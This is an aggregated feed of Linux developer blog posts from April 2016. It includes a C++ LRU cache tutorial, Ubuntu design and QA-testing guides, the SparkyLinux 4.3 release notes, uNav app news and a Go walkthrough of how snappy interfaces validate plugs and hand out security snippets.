    typedef struct {
    	Statement *head;
    	Statement *tail;
    	unsigned int size;
    	unsigned int max;
    } StatementLru;

    Then we make the user of a Statement (a view or a model). I’ll be using a Map here; in Qt you can for example use QMap for this. Usually I want relatively fast access based on a key. You could also loop over the stmt_lru each time to find the instance you want in useStatement, based on something in Statement itself. That would rid you of the overhead of a map.

    class StatementUser
    {
    public:
    	StatementUser();
    	~StatementUser();
    	void useStatement(KeyType key);
    private:
    	StatementLru stmt_lru;
    	Map<KeyType, Statement*> stmts;
    	StatementFactory stmt_factory;
    };

    Then we add the members prev and next to the private fields of the Statement class: we’ll make a circular doubly linked list.

    class Statement: QObject {
    	Q_OBJECT
        ...
    private:
    	Statement *next;
    	Statement *prev;
    };

    Next we initialize the LRU:

    StatementUser::StatementUser() 
    {
    	stmt_lru.max = 500;
    	stmt_lru.size = 0;		
    }

    Then we implement the use of the statements:

    void StatementUser::useStatement(KeyType key)
    {
    	Statement *stmt;
    
    	if (!stmts.get (key, &stmt)) {
    
    		stmt = stmt_factory.createStatement(key);
    
    		stmts.insert (key, stmt);
    
    		/* So the ring looks a bit like this: *
    		 *                                    *
    		 *    .--tail  .--head                *
    		 *    |        |                      *
    		 *  [p-n] -> [p-n] -> [p-n] -> [p-n]  *
    		 *    ^                          |    *
    		 *    `- [n-p] <- [n-p] <--------'    */
    
    		if (stmt_lru.size >= stmt_lru.max) {
    			Statement *new_head;
    
    		/* We reached max-size of the LRU stmt cache. Destroy current
    		 * least recently used (stmt_lru.head) and fix the ring. For
    		 * that we take out the current head, and close the ring.
    		 * Then we assign head->next as new head. */
    
    			new_head = stmt_lru.head->next;
    			auto to_del = stmts.find (stmt_lru.head);
    			stmts.remove (to_del);
    			delete stmt_lru.head;
    			stmt_lru.size--;
    			stmt_lru.head = new_head;
    		} else {
    			if (stmt_lru.size == 0) {
    				stmt_lru.head = stmt;
    				stmt_lru.tail = stmt;
    			}
    		}
    
    	/* Set the current stmt (which is always new here) as the new tail
    	 * (new most recent used). We insert current stmt between head and
    	 * current tail, and we set tail to current stmt. */
    
    		stmt_lru.size++;
    		stmt->next = stmt_lru.head;
    		stmt_lru.head->prev = stmt;
    
    		stmt_lru.tail->next = stmt;
    		stmt->prev = stmt_lru.tail;
    		stmt_lru.tail = stmt;
    
    	} else {
    		if (stmt == stmt_lru.head) {
    
    		/* Current stmt is least recently used, shift head and tail
    		 * of the ring to efficiently make it most recently used. */
    
    			stmt_lru.head = stmt_lru.head->next;
    			stmt_lru.tail = stmt_lru.tail->next;
    		} else if (stmt != stmt_lru.tail) {
    
    		/* Current statement isn't most recently used, make it most
    		 * recently used now (less efficient way than above). */
    
    		/* Take stmt out of the list and close the ring */
    			stmt->prev->next = stmt->next;
    			stmt->next->prev = stmt->prev;
    
    		/* Put stmt as tail (most recent used) */
    			stmt->next = stmt_lru.head;
    			stmt_lru.head->prev = stmt;
    			stmt->prev = stmt_lru.tail;
    			stmt_lru.tail->next = stmt;
    			stmt_lru.tail = stmt;
    		}
    
    	/* if (stmt == tail), it's already the most recently used in the
    	 * ring, so in this case we do nothing of course */
    	}
    
    	/* Use stmt */
    
    	return;
    }

    In case StatementUser and Statement form a composition (StatementUser owns Statement, which is what makes most sense), don’t forget to delete the instances in the destructor of StatementUser. In the example’s case we used heap objects. You can loop over the stmt_lru or the map here.

    StatementUser::~StatementUser()
    {
    	Map<KeyType, Statement*>::iterator i;
        	for (i = stmts.begin(); i != stmts.end(); ++i) {
    		delete i.value();
    	}
    }

    29 April, 2016 09:30PM by Philip Van Hoof (pvanhoof@gnome.org)

    Ubuntu developers

    Sam Hewitt: Extending the Ubuntu Icon Spec.

    So you have a new Ubuntu application, you've built it in QML with the Ubuntu SDK and now you're going to give your app a shiny new icon? But you go and visit the official documentation and you go "where do I start? How do I make an icon?" Well, you're kind of out of luck.

    When I started designing app icons for folks, I (too) felt the official specification was lacking detailed instructions and explanations for the Suru design – not to mention it's woefully out of date – which isn't much help. My only recourse was to follow updates to the official icons themselves and to dissect the icons to determine the elements and visual principles that make up the Suru style and updates to it.

    Now, that information or course of action may only be useful to someone like myself who does icon design and can see the cogs behind the images, so what is Jane or Joe app developer to do?

    Not to worry: some time ago I wrote a guide that is an extension of sorts to the official documentation, breaking down the Suru style a bit and showing how you can make an icon yourself, as well as providing a few resources.

    Ubuntu Icon Design Guide

    So if you use and find my guide useful, feel free to contact me if you would like me to critique your icon or give feedback. 😊

    29 April, 2016 08:30PM

    Ubuntu Insights: LTS 16.04 Review roundup!

    xerus_orange_300px_hex (1)

    What a month! We had the release of Ubuntu 16.04 LTS, which allowed us to bring out newer software for the desktop in the form of the snap packaging format and tools.

    By bringing snap packages to Ubuntu 16.04 LTS we are unifying the experience for Ubuntu developers, whether they are creating software for PC, Server, Mobile, and/or IoT devices. This means greater security and reliability, as it allows the two packaging formats – snap packages and traditional deb packages – to live comfortably next to one another, which enables us to maintain our existing processes for development and updates to the OS. This reinforces our relationship with the Debian community and it enables developers and communities to publish either debs or snaps for the Ubuntu audience.

    To celebrate the release, we’ve collated a range of reviews that shed light on what the LTS means. Happy reading!

    Who said Ubuntu’s boring? From Infoworld >

    Great slideshow of all the key features from IDG on Network World >

    ‘Ubuntu 16.04 LTS gives fans new reasons to love this popular linux desktop’ via PC World

    And one of our favourite titles! ‘A perfect marriage between you and Ubuntu’ thanks The Register!

    29 April, 2016 01:00PM

    April 28, 2016

    SparkyLinux

    SparkyLinux 4.3 is out

    New, updated iso images of SparkyLinux 4.3 “Tyche” are available now.
    As before, the Sparky “Home” editions provide a fully featured operating system based on Debian ‘testing’, with desktops of your choice: LXDE, LXQt, KDE, MATE and Xfce.

    Changes between version 4.2 and 4.3:
    – full system upgrade as of April 24, 2016
    – Linux kernel 4.5.1
    – Iceweasel web browser replaced by Firefox
    – Turpial microblogging client replaced by Corebird
    – APTus 0.3.x with an option of installation a set of pre-configured desktops: http://sparkylinux.org/aptus-0-3-0/
    – Ceni network manager replaced by Network Manager in the CLI edition; manual network configuration can be done via the ‘nmtui’ command
    – openjdk and icedtea-plugin updated to version 8.x
    – LibreOffice 5.1.2
    – gstreamer0.10 completely removed, the system uses only gstreamer1.0 now
    – Exaile audio player (based on gstreamer0.10) replaced by Audacious
    – Gnome-Screenshot replaced by Gscreenshot
    – all the iso images are signed with the GPG key, check how to verify Sparky images:
    http://sparkylinux.org/wiki/doku.php/verify_iso

    “Base Openbox” and “CLI” editions changed their names to: MinimalGUI and MinimalCLI. They feature upgraded Sparky Advanced Installer, which lets you install the base system with a minimal set of applications and a desktop of your choice, such as:
    – awesome
    – bspwm
    – Budgie
    – Cinnamon
    – Enlightenment
    – Fluxbox
    – GNOME Flashback
    – GNOME Shell
    – i3
    – IceWM
    – JWM
    – KDE Plasma 5
    – LXDE
    – LXQt
    – MATE
    – Openbox
    – Pantheon
    – Window Maker
    – Xfce

    Find screenshots of all available Sparky desktops at:
    http://sparkylinux.org/4-3-minimaliso-screenshots/

    The installation of a desktop of your choice via the Advanced Installer is possible only if your network connection is on (online installation). Otherwise, the Advanced Installer installs the Live system as it is.

    * Note that the Sparky Advanced Installer lets you install a desktop of your choice using the MinimalGUI or MinimalCLI iso images only. Using the Advanced Installer in the Home editions will install the Live system as it is.

    ISO images of SparkyLinux can be downloaded from the download page:
    http://sparkylinux.org/download

    Known issues:
    * The Pantheon desktop needs to be chosen in the LightDM window instead of the default session at first login.

     

    28 April, 2016 10:37PM by pavroo

    Ubuntu developers

    Costales: From uNav with ❤ to OpenStreetMap


    We (Joerg Berroth, Nekhelesh Ramananthan, Marcos Costales) donated all of this quarter’s money from the uNav donate version to the OpenStreetMap project.

    We love OSM!

    Donation

    We're happy that the 20% of the purchases are going to Ubuntu already :))

    28 April, 2016 08:57PM by Marcos Costales (noreply@blogger.com)

    The Fridge: Ubuntu Online Summit: 3-5 May

    The next Ubuntu Online Summit (UOS) is going to be from 3-5 May 2016 with sessions happening from 14:00 – 20:00 UTC.

    If you are planning to attend, please register here:

    http://summit.ubuntu.com/uos-1605/registration/

    If you and your team need to discuss something at UOS, please get your sessions in as soon as possible:

    http://summit.ubuntu.com/getinvolved/propose-a-session/

    Getting them in earlier will mean that others can plan their attendance accordingly and you will have better turnout. Please note that we are not only keen to have discussion and planning sessions, but also workshops and presentations.

    Originally posted to the community-announce mailing list on Wed Apr 27 08:06:53 UTC 2016 by Daniel Holbach

    28 April, 2016 03:53PM

    Ubuntu Podcast from the UK LoCo: S09E09 – Solitary Confinement - Ubuntu Podcast

    It’s Episode Nine of Season Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Laura Cowen and Martin Wimpress are connected and speaking to your brain.

    We’re here again, although one of us is in Prague!

    In this week’s show:

    That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

    28 April, 2016 02:00PM

    Canonical Design Team: Wallpaper design for Xenial Xerus 16.04

    April marks the release of Xenial Xerus 16.04 and with it we bring a new design of our iconic wallpaper. This post will take you through our design process and how we have integrated our Suru visual language.

    Evolution

    The foundation of our recent designs are based on our Suru visual language, which encompasses our core brand values, bringing consistency across the Ubuntu brand.

    Our Suru language is influenced by the minimalist nature of Japanese culture. We have taken elements of their Zen culture that give us a precise yet simplistic rhythm and used it in our designs. Working with paper metaphors we have drawn inspiration from the art of origami that provides us with a solid and tangible foundation to work from. Paper is also transferable, meaning it can be used in all areas of our brand in two and three dimensional forms.

    Design process

    We started by looking at previously released wallpapers across Ubuntu to see how each has evolved from each other. After seeing the previous designs we started to apply our new Suru patterns, which inspired us to move in a new direction.

    Ubuntu 14.10 ‘Utopic Unicorn’

    wallpaper_unicorn

    Ubuntu 15.04 ‘Vivid Vervet’

    suru-desktop-wallpaper-ubuntu-vivid (1)

    Ubuntu 15.10 ‘Wily Werewolf’

    ubuntu-1510-wily-werewolf-wallpaper

    Step-by-step process

    Step 1. Origami animal

    Since every new Ubuntu release is named after an animal, the Design Team wanted to bring this idea closer to the wallpaper and the Suru language. The folds are part of the origami animal and become the base from which we start our design process.

    Origami

    Step 2. Searching for the shape

    We started to look at different patterns by using various techniques with origami paper. We zoomed into particular folds of the paper, experimented with different light sources, photography, and used various effects to enhance the design.

    The idea was to bring actual origami to the wallpaper as much as possible. We had to think about composition that would work across all screen sizes, especially desktop. As the wallpaper is a prominent feature in a desktop environment, we wanted to make sure that it was user friendly, allowing users to find documents and folders located on the computer screen easily. The main priority was to not let the design get in the way of everyday usage, but enhance it aesthetically and provide a great user experience.

    After all the experiments with fold patterns and light sources, we started to look at colour. We wanted to integrate both the Ubuntu orange and Canonical aubergine to balance the brightness and played with gradient levels.

    We balanced the contrast of the wallpaper color palette by using a long and subtle gradient that kept the bright look and feel. This made the wallpaper brighter and more colorful.

    Step 3. Final product

    The result was successful. The new concept and usage of the Suru language helped to create a brighter wallpaper that fitted into our overall visual aesthetic. We created a three-dimensional look and feel that gives the appearance of actual origami. The wallpaper is still recognizable as Ubuntu, but at the same time looks fresh and different.

    Ubuntu 16.04 Xenial Xerus

    Xerus - purple

    Ubuntu 16.04 Xenial Xerus ( light version)

    Xerus - Grey

    What is next?

    The Design Team is now looking at ways to bring the Suru language into animation and fold usage. The idea is to bring an overall seamless and consistent experience to the user, whilst reflecting our tone of voice and visual identity.

    28 April, 2016 01:39PM

    Simon Quigley: Contributing to Ubuntu - 2 - Ubuntu Quality

    For the past nine months, I have done a couple of forms of QA for the Ubuntu project and its flavors. In this blog post, I plan on highlighting some common practices and how I contributed.

    ISO QA Test

    Download the image

    For demonstration purposes, I'll grab the Lubuntu daily image, which as I'm writing this, is the Yakkety daily image. First, navigate to cdimage.ubuntu.com, it should look similar to the below screenshot:

    Since in this case we are testing Lubuntu, select lubuntu/; the page should look like this after loading:

    Lubuntu is a special case: it has desktop images and alternate images [1]. The desktop image is the same kind of image every flavor provides, while the alternate image uses the Debian installer and requires less RAM to run. In this case, let's test the alternate image, so select daily/; the page should look like this after loading:

    In the above screenshot, I have noted a few things; here is the purpose of each directory [2]:
    20160425/ - I am writing this on April 26, 2016 (20160426), but this directory exists to ensure we have an image from the previous day for testing purposes, in the odd case that something gets messed up.
    20160426/ - These are today's images.
    current/ - All of the images go through some automatic testing before being copied here; these are the most recent images that passed those tests.
    pending/ - This directory holds the images that are either currently being tested or that haven't passed the tests yet; these are usually the same files as in 20160426/.

    We are going to grab the image from the current/ directory. The page for current/ should look like the following screenshot [3]:

    Scroll down and you should see the following:

    Listed are three architectures: amd64 (which is 64-bit), i386 (which is 32-bit), and PowerPC (old Macintosh machines). Other Ubuntu flavors usually have only amd64 and i386, but Lubuntu has a PowerPC image as well. We have six (6) files for each architecture:

    1. *.OVERSIZED - irrelevant right now; you do not need to worry about it.
    2. *.iso - the image file.
    3. *.iso.zsync - the zsync file for the image.
    4. *.jigdo - the Jigdo file.
    5. *.list - the list file.
    6. *.template - the Jigdo template file.

    I will show you how to use two (2) of the six (6) files listed above - the .iso and its .iso.zsync - to download the images. Ensure the zsync package is installed on your system before continuing. Yes, you can simply download the image with your web browser, but there is a better way: zsync. zsync downloads the image, and when the image changes it merges only the changes into the copy you already have instead of downloading everything again. Since the directory and image name stay the same for the whole development cycle, you can safely reuse one link until the development release is released. (The example link below happens to be for the desktop image from daily-live/, but the process is identical for the alternate images.) I'll create a directory to put the images in:
    $ mkdir daily-images && cd daily-images
    Copy the zsync link for your architecture and paste it into the terminal, for example:
    $ zsync http://cdimage.ubuntu.com/lubuntu/daily-live/current/yakkety-desktop-amd64.iso.zsync
    When you press Enter, the image will download. When this is done, you should have the image ready to go.

    Getting set up with the ISO QA Tracker

    Navigate to iso.qa.ubuntu.com in your browser; you should see the following:

    On the left side, click the Log in button. You should be brought to a page that looks like this:

    If you already have an Ubuntu One account, log in with your credentials and press the Log In button. If you don't have an account, create one. I don't plan on going into much detail on this, so let's move on. You should be brought to a screen that looks similar to this:

    Click the Yes, log me in button. You should be brought to the following screen, if you have a black bar at the top like in the image, you have logged in correctly:

    Towards the bottom, you should see the Yakkety Daily suite [3]. Click on that and you should get to a screen with various options for images. Scroll down and you should see a screen similar to this:

    Since I downloaded the amd64 desktop image earlier, I will select Lubuntu Desktop amd64. You should get to a screen that looks like this:

    Here we have four test cases to choose from:

    • Install (auto-resize) - requires an existing installation.
    • Install (entire disk) - very generic.
    • Install (manual partitioning) - same as entire disk except you get to manually partition everything.
    • Live Session - testing the live instance.

    Because it's the most generic, I'll select Install (entire disk). When you click on that, you should get a screen similar to this:

    If you scroll down to the bottom, you should see something similar to this:

    Filling it out will be covered in a bit, but it's good to know what the submission form looks like.

    Executing the test case

    A lot of the test cases are done in virtual machines; if you have hardware to spare, that's better, but it's not essential. I'm not going to cover how to use a virtual machine, but you can find good guides below. I prefer KVM because the Linux kernel has built-in support for it, it's a lot more integrated, and it's completely free software. I've used VirtualBox in the past, and it's a great program, but it's proprietary, and the kernel modules can be a bit finicky to get working after a kernel upgrade.

    Before you begin, read over the test case you plan on executing; there may be some important instructions that you need to watch out for. When you are ready to start, select the In Progress radio box on the test case and press the Submit result button. Complete the test exactly how the test case says it should be done.

    During the installation, if you encounter an error that is critical enough that you cannot proceed, first look at the Bugs to look for section. Is there a bug that describes your problem? If not, search Launchpad for the bug. If it's not there, identify the culprit package and file a bug against it. If you have trouble doing this, join the #ubuntu-quality channel using your IRC client (or the IRC client provided below) and ask for help.

    When you are done, on the test case page, click the button to edit your test case result:

    You should be brought to a page similar to this:

    If you had no trouble installing using the instructions, select the Passed radio box. For the bugs, from what I have seen, any bugs in the system, NOT just installation bugs, should be reported. So look at the release notes of the most recent milestone for the flavor you are testing, and go through the bug reports. Confirm as many as you can; when you do, mark the bug as Me too and list the bugs under the Bugs header in the following format:

    XXXXX, YYYYY, ZZZZZ

    Be careful: the tracker likes to insert extra commas and sometimes mangles this a bit. Always check this field before updating your result.

    When you have all the bugs cited on this page, select the Update result button. If you then scroll down to the bottom, you should see your Launchpad ID with a green checkmark beside it and links to the bugs you listed. Congrats! You have now completed that test case!

    Package QA Test

    The package QA tests exist to ensure that all packages are thoroughly tested for the release. Ensure you have an installation of the daily image for that flavor. Before you begin, ensure you have an Ubuntu One account set up. Also ensure you have read the previous section as I will not repeat some information that is explained above.

    Navigate to packages.qa.ubuntu.com in your browser; you should see the following:

    Click on Yakkety Daily [3] and you should be brought to a screen similar to this:

    Since, as of the time of writing, Xubuntu is the only flavor with package test cases, click on Xubuntu Desktop and you should be brought to a screen similar to this:

    At this point, open the test case and complete it as normal, making sure to follow the instructions exactly as they are listed. Instead of checking the release notes, go to the Launchpad bugs page for each package and check against all of the bugs. You can find the bugs for each package at the following URL, replacing PACKAGE with the respective package name:

    https://bugs.launchpad.net/ubuntu/+source/PACKAGE

    After this is done, congrats! You just completed a Package QA test!

    Write a manual test case

    The manual test cases are not automatically generated; they are hand-written for each application. I will explain how to write a test case, but I'm not actually going to write one here, because that would be too tedious to put in this article.

    To keep track of the manual test cases that need writing, we have a bug for each test case with details on what needs doing. I've done this a few times before, so I know these already, but read over the instructions for writing a test case before you begin. First, assign the bug to yourself and mark it as In Progress. Then read over the bug report and its responses to make sure you know what you are doing. Next, ensure the program is installed by default in the flavor the bug report specifies. If it is not, mark the bug as Incomplete and state that the program is not in the specified flavor. If it is there, you can continue.

    After that, grab the source for the Ubuntu Manual Test Cases. Ensure you have bzr installed and run:

    $ bzr branch lp:ubuntu-manual-tests

    Then cd into the ubuntu-manual-tests directory that was just created. Go into the testcases/packages/ directory, and another subdirectory if applicable. Open your favorite text editor and create a file with the name of the package you are writing a test case for; there is no need for any numbers. Using the guide above, write the test case and verify it. Below I have embedded a video by Nicholas Skaggs if you prefer to follow along that way:

    When you are done, make sure you are directly in the ubuntu-manual-tests directory, and execute the following command [4]:

    $ bzr add * && bzr commit --fixes lp:BUG#

    Then push to a Bazaar branch in Launchpad:

    $ bzr push lp:~/ubuntu-manual-tests/bugfix#####

    Then go to the Bazaar page for the Ubuntu Manual Testcases project and find your branch. Then submit a merge request detailing your test case. Congrats! You wrote a manual test case!

    Further questions?

    If you are on my website, I have embedded an IRC client below for you to use if you do not have your own. Type in a nickname, press start, and press Enter to speak in the channel. If you have an IRC client, go to #ubuntu-quality on irc.freenode.net. If you prefer not to use IRC, we have a mailing list that you can use if you wish. Good luck and I hope to see you around! ☺

    1. We also have a preinstalled image, but I will not cover that in this tutorial.
    2. Even though the directory names will have changed, the information is still accurate.
    3. This information will still be valid after we move on from Yakkety images.
    4. Make sure Bazaar is set up properly before doing this.
    If you have questions/comments/concerns/suggestions about this article, my email is tsimonq2@ubuntu.com or I am tsimonq2 on Freenode (PMs and pings welcome).

    28 April, 2016 03:45AM by Simon Quigley (tsimonq2@ubuntu.com)

    April 27, 2016

    Costales: sudo apt-get install ubuntuphone unav libertad

    Virio, an Asturian warrior and the clan's current leader, gazed defiantly at his hillfort from the yew tree.
    Beneath his feet, the earth soaked with blood from the last battle reminded him that Roman greed would once again ravage them with endless wars.

    Adaptation of the Asturian warrior by Berto Peña

    But he was not looking at the hillfort. His heart beat exuberantly and his mind went further still. He swore to the Nuberu to cherish freedom for the rest of his days. After the victory they were still free of the Roman yoke.

    In the distance, the sound of bagpipes and drums echoed through the narrow streets and squares of the hillfort. The unbridled revelry of victory. The moment to celebrate their freedom.


    Now, it's your turn ;)
    # apt-get install ubuntuphone unav libertad

    27 April, 2016 07:19PM by Marcos Costales (noreply@blogger.com)

    Nekhelesh Ramananthan: uNav 0.59 "Beauty and the Beast" is OUT!


    The uNav team is proud to announce the release of uNav 0.59 code named Beauty and the Beast. In my opinion, this is truly one of the best releases we have pushed out. The code name should give you a hint of what we focused on for 0.59 ʘ‿ʘ

    User Testing

    We started doing user testing early in the development cycle with friends and colleagues, which revealed several interesting issues that new users found confusing and detrimental to the uNav experience. I suppose the first step in solving a problem is acknowledging we have a problem. Internally we found it difficult to accept that certain features like NearBy, the menu navigation and Search, which we had spent hours building, were not as intuitive as we thought they would be.

    I am thankful to the volunteers who joined our user testing sessions which resulted in a brand new navigation structure described in the next section.

    Brand new navigation structure

    User testing revealed that our menu (the route page) was inefficient and misleading. While it did present a nice launch pad from which users could perform actions, it took longer to perform basic actions like searching and navigating.

    So we took a step back and looked at the bigger picture and asked ourselves,

    What is uNav? What do users really use uNav for?

    The answer is simple: uNav is a navigation app which helps users get from Point A to Point B. It is critical that we make this feature the highlight of our app and easy to use.

    That meant bringing the ability to search for locations to the forefront of the app rather than burying it inside menus.


    The search page provides quick access to various search sources (Address, Coordinates & Favorites).


    Visual Revamp

    As you may have guessed from our code name, we have a beast of an app in uNav... this release we focused on turning that beast into a princess ;). We injected some brand color into the app to make it more lively.

    The interface also guides the user and prevents them from making a mistake. I have talked about this in past posts: the best interface is one which actively prevents the user from making a mistake, rather than just showing an error dialog afterwards.

    Here is a small example of it in action,


    The zoom buttons got a bit of design love to improve their contrast against the map background.


    POI Details

    This is my personal favorite feature in this release. It shows all available information about a POI. This feature is heavily dependent on the OpenStreetMap database. However, I have found that adding details about a POI (restaurant, shop etc.) is super easy using OSM's web editor. By taking a few moments to fill them out, you help out the community as well.


    Reverse Geocode

    You can long-press on any point in the map to get its address. If that point turns out to be a POI, then we show you its details.


    Performance Improvements

    There are some massive improvements to route calculation time when the speed camera alerts feature is enabled. In our tests, a 500 km road trip would take 2-3 minutes before uNav displayed the route and the speed cameras. Now it only takes 2-3 seconds!

    Pinch Zoom

    Did you just read pinch-zoom? Yes you did! uNav 0.59 finally brings pinch-zoom and also an improved long-press feature.

    Well that's all from me. Hopefully I didn't bore you with my long blog post. Loving uNav? Be sure to let us know with your reviews in the app store.

    Next up, Chameleonic uNav!

    27 April, 2016 06:26PM

    Dustin Kirkland: Canonical and IBM Webinar -- Ubuntu on POWER and LinuxONE

    I'm delighted to share the slides from our joint IBM and Canonical webinar about Ubuntu on IBM POWER8 and LinuxONE servers.  You can download the PDF here, or tab through the slides embedded below.  The audio/video recording should be available tomorrow.



    Cheers,
    :-Dustin

    27 April, 2016 06:07PM by Dustin Kirkland (noreply@blogger.com)

    Zygmunt Krynicki: Anatomy of a snappy interface

    This post is the third in a series about snappy interfaces. Knowledge presented in posts one and two is assumed.

    Today we will look at what makes an interface. This post might be a bit heavier on the programming side so feel free to skip over the code fragments if that is not your thing. Note that we will not build an actual interface just yet. The goal of this article is to set the stage for that to be meaningful, at least in part.

    The Interface interface

    From the point of view of snappy, an Interface is a bit of code with specific APIs. In go's terms it is an interface (note the lower case i). If you are familiar with other languages it is just a way to describe a class with a specific set of methods.

    In go, this is spelled out as:

    type Interface interface {
    ...
    }


    This can be read as "the go type Interface is an object with the following methods ..."

    Interface name

    At a very basic level each interface has a name.

    type Interface interface {
    Name() string
    ...
    }

    That is, given an arbitrary interface, you call the Name method to obtain the name of that interface. The interface name must be unique and is something that other developers will refer to, so plan ahead and pick a good, descriptive name. You cannot just change it later.

    Validating plugs and slots

    Two of the methods in an Interface are used to verify if a plug or slot definition is correct.

    type Interface interface {
    ...
    SanitizePlug(plug *Plug) error
    SanitizeSlot(slot *Slot) error
    ...
    }
    Remember that plugs and slots can hold arbitrary attributes. A particular interface, say, one that allows access to a GPIO pin, can use an attribute to describe which particular pin is exposed. As an interface author you should check if the pin is specified correctly (e.g. that it is a number, that it has a sensible value, etc).

    Both methods take an object to sanitize (a plug or a slot) and return an error if the object is incorrect. If you don't need to check anything just return nil and carry on.
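    To make this concrete, here is a minimal, self-contained sketch of what the validation side of a hypothetical "gpio" interface could look like. Note that the Plug and Slot types below are simplified stand-ins written just for this sketch (the real types live in the snappy source tree), and the "pin" attribute is an invented example rather than part of any published interface:

    package main

    import "fmt"

    // Plug and Slot are simplified stand-ins for snappy's real types;
    // here they only carry the arbitrary attributes mentioned above.
    type Plug struct {
    	Attrs map[string]interface{}
    }

    type Slot struct {
    	Attrs map[string]interface{}
    }

    // gpioInterface is a hypothetical interface exposing a single GPIO pin.
    type gpioInterface struct{}

    // Name returns the unique, descriptive name other developers will refer to.
    func (iface *gpioInterface) Name() string {
    	return "gpio"
    }

    // SanitizePlug verifies that the plug declares a sensible "pin" attribute.
    func (iface *gpioInterface) SanitizePlug(plug *Plug) error {
    	pin, ok := plug.Attrs["pin"]
    	if !ok {
    		return fmt.Errorf("gpio plug must declare a pin attribute")
    	}
    	number, ok := pin.(int)
    	if !ok {
    		return fmt.Errorf("gpio pin attribute must be a number")
    	}
    	if number < 0 {
    		return fmt.Errorf("gpio pin %d is not a valid pin", number)
    	}
    	return nil
    }

    // SanitizeSlot has nothing extra to check in this sketch, so it just
    // returns nil and carries on.
    func (iface *gpioInterface) SanitizeSlot(slot *Slot) error {
    	return nil
    }

    func main() {
    	iface := &gpioInterface{}
    	good := &Plug{Attrs: map[string]interface{}{"pin": 17}}
    	bad := &Plug{Attrs: map[string]interface{}{"pin": "seventeen"}}
    	fmt.Println(iface.SanitizePlug(good)) // <nil>
    	fmt.Println(iface.SanitizePlug(bad))  // gpio pin attribute must be a number
    }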

    Interfaces and snippets

    Having a valid plug and slot, the main thing that interfaces do is influence the various security systems. This is implemented as a set of four methods. Before I spill the beans on the code, I will explain this informally.

    A small digression: when you see a security system mentioned below, think of things like apparmor and seccomp. I will focus on security systems in a dedicated instalment. For now they are simply a part of the overall security story.

    Each security system is responsible for setting up security for each app of each snap. By default all apps get the same treatment; there is nothing unique about any particular app. Interfaces allow extra information to be passed to a particular security system, letting a particular app do more than it otherwise could.

    This extra information is exchanged as snippets. Snippets are just bits of untyped data, blobs, sequences of bytes. In practice all current snippets are just pieces of text that are easy to read and understand.

    Interfaces can hand out snippets for each of the four distinct cases:
    1. the mere fact of having a plug of a given interface
    2. the fact of having a particular plug connected to a particular slot
    3. the mere fact of having a slot of a given interface
    4. the fact of having a particular slot connected to a particular plug
    Note that there is a pattern. Applications can get extra permission by simply having a specific plug or a specific slot. Applications can also get extra permission by making an interface connection between a plug and a slot.

    Typically most permissions will be based around a plug connected to a slot. Apps bound to the plug will be allowed to talk to a specific socket, to a specific DBus object, to a specific device on the system. All such permissions will be expressed through a snippet provided by case 2 in the list above.

    For applications providing services to other snaps (e.g. bluez, network-manager, pulseaudio, mir, X11) the mere fact of having a slot will grant permissions to create the service (to configure network, manage GPUs, etc). Applications like this will use the mechanism provided by case 3 in the list above.

    The meaning of the snippets is almost opaque to snappy. Snappy collects them, assembles them together and hands them over to security backends to process. At the end of the day they end up as various configuration files.

    So what does the method definition look like? Like this:

    type Interface interface {
    ...
    PermanentPlugSnippet(plug *Plug, securitySystem SecuritySystem) ([]byte, error)
    ConnectedPlugSnippet(plug *Plug, slot *Slot, securitySystem SecuritySystem) ([]byte, error)
    PermanentSlotSnippet(slot *Slot, securitySystem SecuritySystem) ([]byte, error)
    ConnectedSlotSnippet(plug *Plug, slot *Slot, securitySystem SecuritySystem) ([]byte, error)
    ...
    }

    Note that each method gets the name of the security system as an argument. A single interface can influence all security systems if that is required for it to operate correctly.
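    Continuing the hypothetical gpio sketch from earlier (the same caveat applies: the SecuritySystem type, the "apparmor" constant and the snippet text below are invented stand-ins for illustration, not the real snappy definitions), the connected-plug case could look roughly like this:

    // SecuritySystem identifies a security backend such as apparmor or seccomp.
    // This is an illustrative stand-in for the real definition.
    type SecuritySystem string

    const SecurityAppArmor SecuritySystem = "apparmor"

    // ConnectedPlugSnippet hands out extra permissions only when the plug is
    // actually connected to a slot, and only for the backend that asked.
    func (iface *gpioInterface) ConnectedPlugSnippet(plug *Plug, slot *Slot, securitySystem SecuritySystem) ([]byte, error) {
    	switch securitySystem {
    	case SecurityAppArmor:
    		// The snippet is just a blob of bytes; the backend assembles all
    		// the snippets it collected into its configuration files. The
    		// rule text here is made up for the example.
    		return []byte("/sys/class/gpio/** rw,\n"), nil
    	default:
    		// nil, nil means "nothing to add for this security system".
    		return nil, nil
    	}
    }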

    Connecting interfaces automatically

    One last thing an interface can do is say that it wants to automatically connect plugs to viable slots under certain conditions. This is expressed as the following method:

    type Interface interface {
    ...
    AutoConnect() bool
    }

    This feature was designed to let snappy automatically connect plugs in snaps being installed if there is a viable, unique slot on the OS snap that satisfies the interface requirements. If you recall, the OS snap exposes a number of slots for things like network, network-bind and so on. To make the user experience better, when a snap wants to use one of those interfaces the user does not have to connect them explicitly.

    Please note that we're going to be conservative in what can be connected automatically. As a rule of thumb auto-connection is allowed if this is a reasonable thing to do and it is not a serious security risk (the interface doesn't hand out too much power).
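    To round off the hypothetical gpio sketch from above, the remaining methods can be trivial: the permanent-plug, permanent-slot and connected-slot cases hand out nothing, and such an interface would not auto-connect, since giving out hardware access is exactly the kind of decision a user should make explicitly. As before, this is an illustrative sketch rather than real snappy code:

    // The remaining snippet methods hand out nothing in this sketch.
    func (iface *gpioInterface) PermanentPlugSnippet(plug *Plug, securitySystem SecuritySystem) ([]byte, error) {
    	return nil, nil
    }

    func (iface *gpioInterface) PermanentSlotSnippet(slot *Slot, securitySystem SecuritySystem) ([]byte, error) {
    	return nil, nil
    }

    func (iface *gpioInterface) ConnectedSlotSnippet(plug *Plug, slot *Slot, securitySystem SecuritySystem) ([]byte, error) {
    	return nil, nil
    }

    // AutoConnect is false: handing out access to hardware pins is too much
    // power to grant without an explicit connection made by the user.
    func (iface *gpioInterface) AutoConnect() bool {
    	return false
    }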

    The complete picture

    You can check the complete interface code, with documentation, here. The key thing to take out of this whole article is that interfaces are bits of code that can validate plugs and slots and hand out security snippets.

    How this actually gets used and what the snippets should look like, that is for the next post.

    27 April, 2016 12:50PM by Zygmunt Krynicki (noreply@blogger.com)

    hackergotchi for Maemo developers

    Maemo developers

    Secretly reusing my own LRU code

